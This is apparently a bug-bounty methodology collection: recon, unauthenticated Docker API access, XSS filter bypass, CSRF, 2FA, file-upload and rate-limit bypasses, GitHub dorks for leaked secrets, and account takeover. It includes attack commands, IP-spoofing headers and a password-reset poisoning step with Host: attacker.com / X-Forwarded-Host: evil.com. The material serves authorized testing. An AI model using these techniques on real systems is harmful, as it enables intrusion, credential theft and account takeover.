/Misconfigurations/Docker.md:
--------------------------------------------------------------------------------

# Docker API unauthorized RCE
- Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications.
  The Docker daemon (dockerd) provides an API used for remote control of the Docker service. By default the daemon listens on the Unix socket /var/run/docker.sock; when it is bound to a public interface instead, it can be used by an attacker to compromise the container system, because there is no authentication by default.

## Background concept:

- The host is running Docker with the daemon bound to the external interface and no access control or authentication
- The attacker uses Docker API functions to enumerate, manage and control the container service; the attacker is able to control existing deployed containers or create new ones.
- The Docker API returns JSON responses containing the output of the command issued.
- Enumerating Docker API services
- By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, Docker host APIs can be accessed over the public internet.

```
nmap -p 2375,2376 IP
nmap -p- IP
nmap -Pn -p 2375 IP
nmap -sV -p 2375 IP
```
- To confirm that the Docker service is running on the target, open the URL in the browser and check the response
  ex: `https://IP:2375`
- We will receive a response something like this:
  `{"message":"page not found"}`
- To confirm the version details we can use this:
  `https://IP:2375/version`

- The commands used to exploit

- This command is used to get all the information about the Docker host
  `docker -H IP:2375 info`

- List all the running containers
  `docker -H IP:2375 ps`

- List all containers, including stopped ones
  `docker -H IP:2375 ps -a`

- Docker command for RCE
  `docker -H IP:2375 exec -it container_name /bin/bash`

## Contributor:
- [N3T_hunt3r](https://twitter.com/N3T_hunt3r)

--------------------------------------------------------------------------------
/Recon/Workflow.md:
--------------------------------------------------------------------------------

## Recon workflow

1. IP space discovery
2. TLDs, Acquisitions, & Relations
3. Subdomain Enum
4. Fingerprinting
5. Dorking
6. Content Discovery
7. Parameter Discovery

## ASN Discovery

**ASN Discovery of Target:**

[https://bgp.he.net](https://bgp.he.net/)

**ASN using whois:**

`whois -h whois.cymru.com $(dig +short example.com)`

NOTE: Be careful, because sometimes you might get the ASN of a VPS provider like DigitalOcean etc. Don't work on those.

**Using Nmap & ASN for discovering IPs related to the targeted ASN**

`nmap --script targets-asn --script-args targets-asn.asn=`

**Gathering company intel using Amass**

`amass intel -org `

**ARIN for ASN:**

[`https://whois.arin.net`](https://whois.arin.net/)

**Site: IPINFO for ASN**

[`https://ipinfo.io`](https://ipinfo.io/)

**Subdomains from ASNs using Amass:**

`amass intel -asn `

## Discovering Brands

***Looking for acquisitions or related orgs to target***

- Wikipedia
- Crunchbase

  [Crunchbase: Discover innovative companies and the people behind them](https://www.crunchbase.com)

- Owler

  [Owler](http://owler.com/)

- AcquiredBy

  [AcquiredBy | Definitive list of bootstrapped acquisitions](https://acquiredby.co/)

- LinkedIn
- Reverse WHOIS using the amass intel module

  `amass intel -d domain.com -whois`

- BuiltWith

  [BuiltWith](https://builtwith.com/)

- Google dork:

  `intext:"copyright ©️ org_name"`

- Shodan dork using HTTP favicon hashes

  `http.favicon.hash:`

**The favicon hash can be found using [favfreak](https://github.com/devanshbatham/FavFreak)**

### Author
[Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533)

--------------------------------------------------------------------------------
/GraphQL/GraphQL.md:
--------------------------------------------------------------------------------

## Videos
- GraphQL Video - [InsiderPhd](https://www.youtube.com/watch?v=GlvNwhq-uBg)
- [REST in Peace: Abusing GraphQL to Attack Underlying Infrastructure - LevelUp 0x05](https://www.youtube.com/watch?v=NPDp7GHmMa0)

## Blogs
- Exploit GraphQL - [Yeswehack Blog](https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/)
- Hacking
GraphQL - [Part 1](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa) [Part 2](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-2-methodology-and-examples-5992093bcc24)
- [That single GraphQL issue that you keep missing](https://blog.doyensec.com/2021/05/20/graphql-csrf.html) by [Doyensec](https://www.doyensec.com/)
- [Reverse engineer a GraphQL API](https://swizec.com/blog/reverse-engineer-a-graphql-api-to-automate-love-notes-codewithswiz-24)
- [Exploiting GraphQL](https://blog.assetnote.io/2021/08/29/exploiting-graphql/) by [Assetnote](https://assetnote.io/)
- [GraphQL Resources Thread](https://twitter.com/holybugx/status/1441460070387261440?s=21) by [HolyBugx](https://twitter.com/HolyBugx)
- [GraphQL Test Cases](https://anmolksachan.github.io/graphql/)

# Tools
- [GraphQL Voyager](https://apis.guru/graphql-voyager/)
- [GraphQL Cheatsheet](https://devhints.io/graphql)
- [AutoGraphQL](https://graphql-dashboard.herokuapp.com/) - Demo [Video](https://www.youtube.com/watch?v=JJmufWfVvyU)
- [graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility to learn more about what technology is behind a given GraphQL endpoint
- [InQL - Introspection GraphQL Scanner](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f) - A security testing tool to facilitate GraphQL technology security auditing efforts
- [Graphicator is a GraphQL "scraper" / extractor](https://github.com/cybervelia/graphicator)

# Labs
- Damn-Vulnerable-GraphQL-Application - [Github](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)

--------------------------------------------------------------------------------
/XSS/XSS_Bypass.md:
--------------------------------------------------------------------------------

# XSS Filter Bypass Techniques

## Introduction

For those
new to Cross-Site Scripting (XSS) attacks, it is essential to first understand the fundamental concepts before exploring filter bypass techniques. 6 | 7 | --- 8 | 9 | ## Alternatives to `alert()` 10 | 11 | Many web applications block the `alert()` function to mitigate XSS attacks. Below are alternative functions that can be used: 12 | 13 | - **`confirm()`** instead of `alert()` 14 | - **`prompt()`** instead of `alert()` 15 | - **`console.log()`** instead of `alert()` 16 | - **`eval()`** instead of `alert()` 17 | 18 | --- 19 | 20 | ## Alternatives to the `onerror` Event Handler 21 | 22 | If the `onerror` event handler is blocked, the following alternatives can be used to trigger JavaScript execution: 23 | 24 | - **`onload`** 25 | - **`onfocus`** 26 | - **`onmouseover`** 27 | - **`onblur`** 28 | - **`onclick`** 29 | - **`onscroll`** 30 | 31 | These event handlers can be embedded within HTML elements to execute scripts when the event is triggered. 32 | 33 | --- 34 | 35 | ## Handling Parentheses Filtering 36 | 37 | If parentheses `()` are filtered, backticks `` ` ` `` can be used as an alternative. Examples: 38 | 39 | ```html 40 | 41 | 42 | 43 | javascript:prompt`1` 44 | javascript:alert`1` 45 | ``` 46 | 47 | This method is effective against weak input sanitization mechanisms that only block standard function calls enclosed in parentheses. 48 | 49 | --- 50 | 51 | ## Additional Resources 52 | 53 | For further learning and reference, the following resources provide comprehensive details on XSS filter evasion techniques: 54 | 55 | 1. **PortSwigger XSS Cheat Sheet** - [Visit PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 56 | 2. 
**OWASP XSS Filter Evasion Cheat Sheet** - [Visit OWASP](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) 57 | 58 | --- 59 | 60 | ## Contact Information 61 | 62 | For discussions and insights, you can connect with: 63 | 64 | - **[@Fani Malik](https://twitter.com/fanimalikhack/)** 65 | 66 | --- 67 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 68 | -------------------------------------------------------------------------------- /Recon/subdomain_enumeration.md: -------------------------------------------------------------------------------- 1 | # Subdomain Enumeration 2 | Well, subdomain enumeration is important when you are hunting on wildcard enable scope programs. 3 | If you are able to get unique subdomains that other miss then it's a good chance for you to get some bugs 4 | 5 | # General Methodology 6 | * Passive 7 | * Active 8 | * Permutation 9 | 10 | ## Passive 11 | In this stage you have to use as much resources as you can to passivly gather subdomains 12 | Now a days it's not that much hard to do with community standard tools that usages API keys 13 | 14 | ### Tools 15 | 16 | * Subfinder 17 | * Amass 18 | * Assetfinder 19 | * Findomain 20 | 21 | ## Active 22 | In this stage you have to perform bruteforcing on your target host to see if the word from your wordlist resolve as valid subdomain or not 23 | 24 | ### Tools 25 | 26 | * ShuffleDNS 27 | * Aiodnsbrute 28 | 29 | ## Permutation 30 | In this stage you have to play around the subdomains. 
Alter the words in the discovered names and check whether the results still resolve as valid subdomains.

## Portscan
Convert domains into IP addresses:
```bash
# Resolve each name, keep the first IPv4 answer, and append it to ips.txt
while read -r l; do
  ip=$(dig +short "$l" | grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' | head -1)
  echo "[+] '$l' => $ip"
  [ -n "$ip" ] && echo "$ip" >> ips.txt   # skip names that did not resolve
done < domains.txt
```

We will use masscan for faster results:

```bash
masscan -p1-65535 -iL ips.txt --max-rate 1800 -oG output.log
```

Or you can use [Naabu](https://github.com/projectdiscovery/naabu) or [RustScan](https://github.com/RustScan/RustScan/).

### Tools

* AltDNS
* DNSGen + ShuffleDNS

## Reference & Resources

https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html

https://0xpatrik.com/subdomain-enumeration-2019/

https://0xpatrik.com/subdomain-enumeration-smarter/

https://rootsploit.com/bug-bounty-recon-faster-port-scan/

There is a lot more you can do. For now this only lists community-standard approaches; it will be updated regularly as new methodology comes out.

## Framework
An automated framework can be used to automate this whole workflow:

* [SEF](https://github.com/remonsec/SEF)
___
## Author
[Mehedi Hasan Remon](https://twitter.com/remonsec)
[Rishi Choudhary](https://twitter.com/0xRyuk)

--------------------------------------------------------------------------------
/CSRF/Cross_Site_Request_Forgery_Bypass.md:
--------------------------------------------------------------------------------
**Cross Site Request Forgery (CSRF)**

Hello guys, I tried my best to share all the CSRF bypasses I know.
I hope this will help you.
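As an added example (not from the HowToHunt authors), here is a server-side CSRF check in Python written so that each trick in the bypass list that follows is rejected: method switching, a removed, blank, same-length, truncated or foreign-session token, Referer substring matching, and a stripped Referer. `Request`, `issue_token`, `csrf_check` and the host `bank.example` are hypothetical names.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not the HowToHunt authors' code. Hypothetical names throughout.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
SITE_HOST = "bank.example"  # constructed: the host an Origin/Referer must name


class Request:
    """Minimal stand-in for a framework request object."""

    def __init__(self, method, headers, form, session):
        self.method = method.upper()
        self.headers = {k.lower(): v for k, v in headers.items()}
        self.form = form          # parsed body parameters
        self.session = session    # server-side session store (a dict here)


def issue_token(session):
    """Mint a random per-session token and keep it server-side only."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _source_host(value):
    """Exact host of an Origin/Referer value, or None if absent or unparsable."""
    if not value:
        return None
    return urlsplit(value).hostname


def csrf_check(req):
    """Return (ok, reason) for a state-changing request.

    Each check maps to an item in the bypass list:
      method switch   -> only non-safe methods are accepted for state changes
      regex tricks    -> hostname compared exactly, never searched as a substring,
                         so bank.example.attacker.tld and attacker.tld/bank.example fail
      removed Referer -> missing Origin and Referer is a rejection, not a pass
      token removed / blank / same length / truncated / from another session
                      -> non-empty, bound to this session, constant-time compare
    Content-Type is deliberately ignored: the token is required regardless,
    so switching JSON to multipart changes nothing.
    """
    if req.method in SAFE_METHODS:
        return False, "state change over a safe method"

    src = _source_host(req.headers.get("origin")) or \
        _source_host(req.headers.get("referer"))
    if src != SITE_HOST:
        return False, "origin/referer missing or not this site"

    expected = req.session.get("csrf_token")
    supplied = req.form.get("csrf_token")
    if not expected or not isinstance(supplied, str) or not supplied:
        return False, "token missing"
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "token mismatch"
    return True, "ok"
```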
CSRF can affect login, logout, password reset, change password, add to cart, like, comment, profile change, user-details change, balance transfer, subscription, etc.
```
-Change the request method (POST => GET)

-Remove the token parameter entirely

-Remove the token value and send a blank parameter

-Copy an unused valid token (by dropping the request that carried it) and use that token

-Use your own CSRF token and feed it to the victim

-Replace the token value with another token of the same length

-Reverse engineer the token

-Extract the token via HTML injection

-Switch from a non-form `Content-Type: application/json` or `Content-Type: application/x-www-form-urlencoded` to `Content-Type: multipart/form-data`

-Change/delete the last or first character of the token

-Change `Referer` to `Referrer`

-Bypass the regex
If the site is looking for "bank.com" in the Referer URL, maybe "bank.com.attacker.com" or "attacker.com/bank.com" will work.

-Remove the Referer header (add this in your payload or HTML code)

-Clickjacking

(If you aren't familiar with clickjacking attacks, more information can be found at https://owasp.org/www-community/attacks/Clickjacking.)
Exploiting clickjacking on the same endpoint bypasses all CSRF protection, because technically the request does originate from the legitimate site. If the page hosting the vulnerable endpoint is vulnerable to clickjacking, all CSRF protection is rendered irrelevant and you can achieve the same results as a CSRF attack on the endpoint, albeit with a bit more effort.
```

### References
[Medium Writeup](https://medium.com/swlh/intro-to-csrf-cross-site-request-forgery-9de669df03de)

[Medium Writeup](https://medium.com/swlh/attacking-sites-using-csrf-ba79b45b6efe)

[Medium Writeup](https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee)


### Authors
* [@SMHTahsin33](https://twitter.com/SMHTahsin33)
* [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
* [@remonsec](https://twitter.com/remonsec)
* [@tamimhasan404](https://twitter.com/tamimhasan404)

--------------------------------------------------------------------------------
/Recon/Github_Dorking.md:
--------------------------------------------------------------------------------
# GitHub Recon:

## Specific Org search:
- "org_name" password
- "org_name" key
- "org_name" api
- "org_name" "filename:vim_settings.xml"
- "org_name" "Authorization: Bearer"
- "org_name" "Language: PHP"

## Sensitive Files search:

- filename:manifest.xml
- filename:travis.yml
- filename:vim_settings.xml
- filename:database
- filename:secrets.yml password
- filename:.esmtprc password
- filename:passwd path:etc
- filename:dbeaver-data-sources.xml
- path:sites databases password
- filename:config.php dbpasswd

## Specific Language based search:

- language:python username
- language:php username
- language:sql username
- language:html password
- language:perl password
- language:shell username
- language:java api
- HOMEBREW_GITHUB_API_TOKEN language:shell

## API keys, Token & Hard-Coded Password search:

- SecretKey / Secret_key / skey
- privatekey / private_key / pkey
- user_secret / userSecret
- admin_passwd / adminpasswd / adminPass etc.
- "api keys"
- authorization_bearer:
- oauth
- auth
- authentication
- client_secret
- api_token:
- "api token"
- client_id
- password
- user_password
- user_pass
- passcode
- secret
- password hash
- OTP
- user auth

## Username search:

- user:name (user:admin)
- org:name (org:google type:users)
- in:login ( in:login)
- in:name ( in:name)
- fullname:firstname lastname (fullname: )
- in:email (data in:email)

## GitHub Dorks for Finding Information using Dates:

- created:<2012-04-05
- created:>=2011-06-12
- created:2016-02-07 location:iceland
- created:2011-04-06..2013-01-14 in:username

## Extension based search:

- extension:pem private
- extension:ppk private
- extension:sql mysql dump
- extension:sql mysql dump password
- extension:json api.forecast.io

## Automated Tools:

1. [TruffleHog](https://github.com/dxa4481/truffleHog)
2. [WatchTower](https://radar.nightfall.ai/)
3. [Dorki](https://dorki.attaxa.com/)

## NOTE :
If you find an API key, credentials or any other sensitive information under a test directory, do not report it, because that is intended behaviour.

## Author:
[Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533)

--------------------------------------------------------------------------------
/MFA_Bypasses/2FA_Bypass.md:
--------------------------------------------------------------------------------
# 2FA Bypass

* 1:- Password Reset Disable 2FA
* 2:- No Rate limit
* 3:- Sending all alphabets instead of number
* 4:- Status Code Manipulation
* 5:- 2FA bypass by substituting part of the request from the session of another account.
```
If a parameter with a specific value is sent to verify the code in the request, try sending the value from the request of another account.

For example, when sending an OTP code, the form ID/user ID or cookie is checked, which is associated with sending the code. If we apply the data from the parameters of the account on which you want to bypass code verification (Account 1) to a session of a completely different account (Account 2), receive the code and enter it on the second account, then we can bypass the protection on the first account. After reloading the page, 2FA should disappear.
```
* 6:- Bypass 2FA using the "memorization" functionality.

`Many sites that support 2FA have a "remember me" functionality. It is useful when the user doesn't want to enter a 2FA code on subsequent logins. It is important to identify the way in which 2FA is "remembered". This can be a cookie, a value in session/local storage, or simply attaching 2FA to an IP address.`
* 7:- OTP Leakage in Response
* 8:- Bypassing 2FA via the OAuth mechanism (mostly not applicable)

`Site.com requests Facebook for OAuth token > Facebook verifies user account > Facebook sends callback code > Site.com logs the user in (rare case)`
* 9:- Bypassing 2FA using response manipulation
```
Enter correct OTP -> Intercept & capture the response -> logout -> enter wrong OTP -> Intercept & replace the response with the earlier successful response -> logged in
```
* 10:- CSRF on 2FA Disable Feature.
```
Sign up for two accounts -> Log into the attacker account & capture the disable-2FA request -> generate a CSRF PoC with .html extension -> Log into the victim account and fire the request -> it disables 2FA, which leads to 2FA bypass.
```
* 11:- Bypass 2FA by adding null or 000000
* 12:- Bypass 2FA by batch API request
```
Suppose a 2FA parameter like "code" or "OTP" is sent with the request; add the same parameter to the request multiple times, like batch mode for a REST API.
```

* https://twitter.com/FaniMalikHack/status/1395042756108505092
* https://twitter.com/FaniMalikHack/status/1402627994833805313

## Twitter :- [Fani Malik](https://twitter.com/FaniMalikHack)

--------------------------------------------------------------------------------
/File_Upload/old_file_upload_bypass.md:
--------------------------------------------------------------------------------
# Bypassing File Uploads

Suppose you have a limitation that you can only upload a few formats like PDF, JPEG, JPG, ... But what if you can upload a PHP file by defeating the upload mechanism and the file-type validation? If someone can upload a PHP file it is game over for the website, as they can upload a PHP shell and easily get RCE or, worse, simply gain a reverse shell on the server.

> __How does the bypass work?__

Well, it depends on which kind of validation the system is using. Is it just verifying the extension? If it is only doing that, it becomes very easy to bypass and upload a PHP file or something else malicious. Suppose we have to upload a JPG file, so the extension must be something.jpg.

---


### 1. Bypassing Normal extension
Now what we can do is upload a file whose name looks like something.php.jpg or somethings.jpg.php.
### 2. Bypassing the magic Byte validation.

For this method we use polyglots. Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.

So while we have to upload a JPEG file type, we can actually upload a PHAR-JPEG file, which will appear to be a JPEG file type to the server while validating. The reason is that the PHAR-JPEG file has both the JPEG header and the PHP file.
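An added Python example (not the author's code) of the server-side validation that the tricks in this section target: traversal in the name, double extensions, a mismatch between the declared type and the magic bytes, and the polyglot case just described, which passes the magic-byte check by design and is therefore neutralised by renaming and non-executable storage rather than by inspection. `validate_upload`, `is_accepted` and the allowlist are hypothetical.

```python
import os
import secrets
from urllib.parse import unquote

# Added example, not the HowToHunt author's code. Names and allowlist are
# hypothetical; the signatures are the standard leading bytes of each format.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return a server-generated storage name, or raise UploadRejected.

    Checks, in order, the tricks described in this section:
      1. traversal    '../test.png' and '..%2Ftest.png' (decoded first)
      2. double ext   'something.php.jpg', 'somethings.jpg.php'
      3. magic bytes  the declared type must match the leading bytes
      4. polyglots    pass check 3 by design, so the file is never kept under
                      its own name nor in a path the web server can execute
    """
    name = unquote(filename)
    base = os.path.basename(name.replace("\\", "/"))
    if base != name or base in ("", ".", "..") or "\x00" in base:
        raise UploadRejected("path characters in filename")

    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("exactly one extension is required")
    ext = parts[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected("extension not on the allowlist")

    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        raise UploadRejected("content does not match the declared type")

    # Random name plus the allowlisted extension; the caller stores it outside
    # the web root and serves it with a fixed Content-Type, so a PHAR/JPEG
    # polyglot is just an image with trailing bytes nobody executes.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename, data):
    """Boolean wrapper for quick checks."""
    try:
        validate_upload(filename, data)
    except UploadRejected:
        return False
    return True
```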
So while uploading it does not get detected, and later, after processing, the PHP file can be used to exploit.

And at last: uploading a shell to random websites for fun is not really cool, so don't ever try it unless you have permission to test.

## 3. Path traversal Upload
Upload a file with a filename such as:

    ../test.png
    ..%2Ftest.png

-----


**How was the bypass possible?**

1. Create a malicious file with an extension that is accepted by the application.
2. Upload that file and click on send.
3. Capture the request in any proxy tool and edit the file extension to the malicious extension that you want. In some cases, you might need to change the content type of the file.
4. Forward the request to the server.

------

**Test PDF upload functionality.**

- [https://github.com/jonaslejon/malicious-pdf](https://github.com/jonaslejon/malicious-pdf)

Resources :-

- [File upload Bypass pdf](https://harshitsengar.in/resources/File%20Upload%20Bypass%20.pdf)

--------------------------------------------------------------------------------
/Rate_limit/README.md:
--------------------------------------------------------------------------------
## RATE LIMIT FLAWS
This flaw is leveraged by malicious actors to perform DDoS, brute-force and bot attacks on APIs, although it covers more than that.
##### NOTE: Some organisations `keep rate-limit bugs as OOS`, so check their policy before testing.
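An added Python example (not from the HowToHunt authors) of a limiter built to resist the bypasses listed in this README and in RateLimitBypass.md: client-IP headers are honoured only when the TCP peer is a trusted proxy, the account identifier and path are canonicalised so `%00`, trailing space, trailing slash and case variants share one bucket, and attempts are counted per account as well as per IP so alternating attacker and victim logins does not reset the count. Names, the trusted proxy range `10.0.0.0/8` and the limits are assumptions.

```python
import ipaddress
import time
import unicodedata
from collections import deque
from urllib.parse import unquote

# Added example, not the HowToHunt authors' code. Hypothetical names; the
# trusted proxy range is constructed.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def client_ip(peer_ip, headers):
    """Address used for limiting. X-Forwarded-For is honoured only when the
    TCP peer is a trusted proxy, and then only its last hop (the value that
    proxy appended). X-Originating-IP, X-Remote-IP, X-Client-IP, X-Host and
    the rest are never read, so 127.0.0.1 / 127.0.1 spoofing opens no bucket."""
    peer = ipaddress.ip_address(peer_ip)
    if any(peer in net for net in TRUSTED_PROXIES):
        hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")]
        hops = [h for h in hops if h]
        if hops:
            try:
                return str(ipaddress.ip_address(hops[-1]))
            except ValueError:
                pass  # unparsable (e.g. '127.0.1'): fall back to the peer
    return str(peer)


def canonical_account(value):
    """Normalise the account identifier: decode, drop control characters
    (%00, %0d%0a, %09, %0C ...), strip padding spaces, case-fold."""
    v = unquote(value)
    v = "".join(ch for ch in v if unicodedata.category(ch)[0] != "C")
    return unicodedata.normalize("NFKC", v).strip().casefold()


def canonical_path(path):
    """Collapse path variants: query string, trailing slash, appended %00,
    case. API version changes (/v1 vs /v2) are not collapsed here; the limit
    should be attached to the handler, not to the URL string."""
    p = unquote(path.split("?", 1)[0])
    p = "".join(ch for ch in p if ch.isprintable())
    return p.rstrip("/").lower() or "/"


class SlidingWindowLimiter:
    """Allow at most `limit` events per key within the last `window_s` seconds."""

    def __init__(self, limit, window_s):
        self.limit, self.window = limit, window_s
        self.events = {}

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.events.setdefault(key, deque())
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def login_allowed(limiter, peer_ip, headers, path, email, now=None):
    """Count on (path, ip) AND (path, account); either bucket full denies.
    Both buckets are evaluated so a denied attempt still counts."""
    h = {k.lower(): v for k, v in headers.items()}
    p = canonical_path(path)
    ip_ok = limiter.allow(("ip", p, client_ip(peer_ip, h)), now)
    acct_ok = limiter.allow(("acct", p, canonical_account(email)), now)
    return ip_ok and acct_ok
```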
## Rate-limit Checks
1 - Rate limit on Forgot password
2 - Rate limit on Sign-up Page
3 - Rate limit on Login Page
4 - Rate limit on Invite user (normal)
5 - Rate limit on Invite user using macros
6 - Rate limit on 2FA
7 - Rate limit on Comment and sent messages
8 - Use your own brain somewhere

## Bypass-Techniques
#### 1 - Append NULL characters at the end of the request :
`%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space`

```
POST /signup/new/1337 HTTP/1.1
Host: api.target.com
...
email=hacker%40gmail.com&password=12345678%00
```
#### 2 - Append NULL characters at the end of the Path :
`%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space`
`POST /profile/post/like%00 HTTP/2`

#### 3 - Using Custom `HTTP headers`
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
```
---
```
X-Originating-IP: 127.0.0.2
X-Forwarded-For: 127.0.0.2
X-Remote-IP: 127.0.0.2
X-Remote-Addr: 127.0.0.2
X-Client-IP: 127.0.0.2
X-Host: 127.0.0.2
X-Forwarded-Host: 127.0.0.2
```
---
```
X-Originating-IP: 127.0.1
X-Forwarded-For: 127.0.1
X-Remote-IP: 127.0.1
X-Remote-Addr: 127.0.1
X-Client-IP: 127.0.1
X-Host: 127.0.1
X-Forwarded-Host: 127.0.1
```

#### 4 - Changing the value of `User-Agent:`
`User-Agent: CHANGED_USERAGENT`

#### 5 - Adding a Custom `parameter` in GET request
`GET /account/passwordreset/?test=test`

#### 6 - Change request body (`JSON -> XML`) or vice versa
Use Burp Extension --> `Content Type Converter`

#### 7 - Changing API version
`/api/v2/user/reset_pw --> /api/v1/user/reset_pw or /api/v3/user/reset_pw`

#### 8 - Bypass through Exploiting a Logic flaw on the Login page
- Take an attacker and a victim account
- Identify how many login attempts the application allows
- For example, if the application allows only 3 attempts, then
- Using Burp macros, send the attacker's login request 1 time and the victim's login request 2 times, or alternate them
- If NOT blocked, repeat the process until we get the victim's password
#### 9 - Try to find the `Origin IP` of the Application
- Shodan
- Censys
- Visit the application with its IP address
- Do your own research

--------------------------------------------------------------------------------
/Rate_limit/RateLimitBypass.md:
--------------------------------------------------------------------------------
# Rate Limit Bypass Techniques
## There are two ways to do that
- Customizing HTTP Methods
- Adding Headers to Spoof IP

## 1. Customizing HTTP Methods
- If the request goes as GET, try to change it to POST, PUT, etc.
- If you want to bypass the rate limit in APIs, try the HEAD method.

## Rate Limit Bypass using Header

Use the following headers just below the Host header:

```
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP

#or use a double X-Forwarded-For header
X-Forwarded-For:
X-Forwarded-For: IP
```
## Adding HTTP Headers to Spoof IP and Evade Detection
- These are headers I've collected so far to bypass rate limits.
```
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
```

## Rate Limit Bypass using Special Characters

- Adding a null byte (%00) at the end of the email can sometimes bypass the rate limit.
- Try adding a space character after the email (not encoded).
- Some common characters that help bypass rate limits: %0d, %2e, %09, %20, %0, %00, %0d%0a, %0a, %0C
- Adding a slash (/) at the end of an API endpoint can also bypass the rate limit. `domain.com/v1/login` -> `domain.com/v1/login/`


## Using IP Rotate Burp Extension

- Try changing the user-agent, the cookies... anything that could identify you
- If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header.
- Change other headers
- Burp Suite's IP Rotate extension works well in many cases. Make sure you have Jython installed along with it.

- Here you'll find everything you need - https://github.com/PortSwigger/ip-rotate


## You can find some more here - [Check this out](https://medium.com/bugbountywriteup/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
## You can find more with screenshots - https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd

# Reference
* https://twitter.com/m4ll0k2/status/1294983599943540738/photo/1
* https://twitter.com/SalahHasoneh1/status/1287366496432332800
* https://twitter.com/SMHTahsin33/status/1295054667613757441 (all in one, must check)

# Authors:
* [Keshav Malik](https://www.linkedin.com/in/keshav-malik-22478014a)
* [0xd3vil](https://linkedin.com/in/0xd3vil)
* [Virdoex_hunter](https://twitter.com/Virdoex_hunter)
* [@0xCyberPirate](https://twitter.com/0xCyberPirate)

--------------------------------------------------------------------------------
/Account_Takeovers_Methodologies/Account_Takeovers_Methods.md:
--------------------------------------------------------------------------------

## Chaining Session Hijacking with XSS
```
1. I have added a session hijacking method in Broken Authentication and Session Management.
2. If you find that on the target,
3. try anyway to steal cookies on that target.
4. Here I am saying: look for XSS.
5. If you find XSS you can steal the victim's cookies, and using session hijacking you can take over the victim's account.
```
## No Rate Limit On Login With Weak Password Policy
```
So if you find that the target has a weak password policy, try to go for no-rate-limit attacks; in the PoC, show it by creating a very weak password for your own account.

(May or may not be accepted)
```
## Password Reset Poisoning Leads To Token Theft
```
1. Go to the password reset function.
2. Enter the email and intercept the request.
3. Change the Host header to some other host, i.e.
Host: target.com
Host: attacker.com
Also try to add some headers without changing the host, like
X-Forwarded-Host: evil.com
Referer: https://evil.com
4. Forward this; if you find attacker.com in the next request, you managed to successfully steal the token. :)
```
## Using Auth Bypass
```
Check out the Auth Bypass method; there is a method for OTP bypass via response manipulation, and this can lead to account takeovers.
1. Enter the wrong auth code / password
2. Capture an auth request in Burp Suite and send it to Repeater
3. Check the response
4. Change the response by manipulating the following parameters
{"code":"invalid_credentials"} -> {"code":"valid_credentials"}
{"verify":"false"} -> {"verify":"true"}


```
## Try For CSRF On
```
1. Change Password function.
2. Email change
3. Change Security Question
```
## Token Leaks In Response

* So there are multiple ways to do it, but all are the same.

* So I will share my method that I have learnt here.

* Endpoints: (Register, Forgot Password)

* Steps (For Registration):
```
1. For registration, intercept the signup request that contains the data you have entered.
2. Click on Action -> Do -> Intercept the response to this request.
3. Click forward.
4. Check whether the response contains any link, token or OTP.
```
------------------------
* Steps (For password reset):
```
1. Intercept the forgot password request.
2. Click on Action -> Do -> Intercept the response to this request.
3. Click forward.
4. Check whether the response contains any link, token or OTP.
```

## Reference:
* Various sources from Google, Twitter, Medium
* https://avanishpathak.medium.com/an-account-takeover-vulnerability-due-to-response-manipulation-e23fe629bd1

## Author
* [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
* [@v3daxt](https://twitter.com/v3daxt)
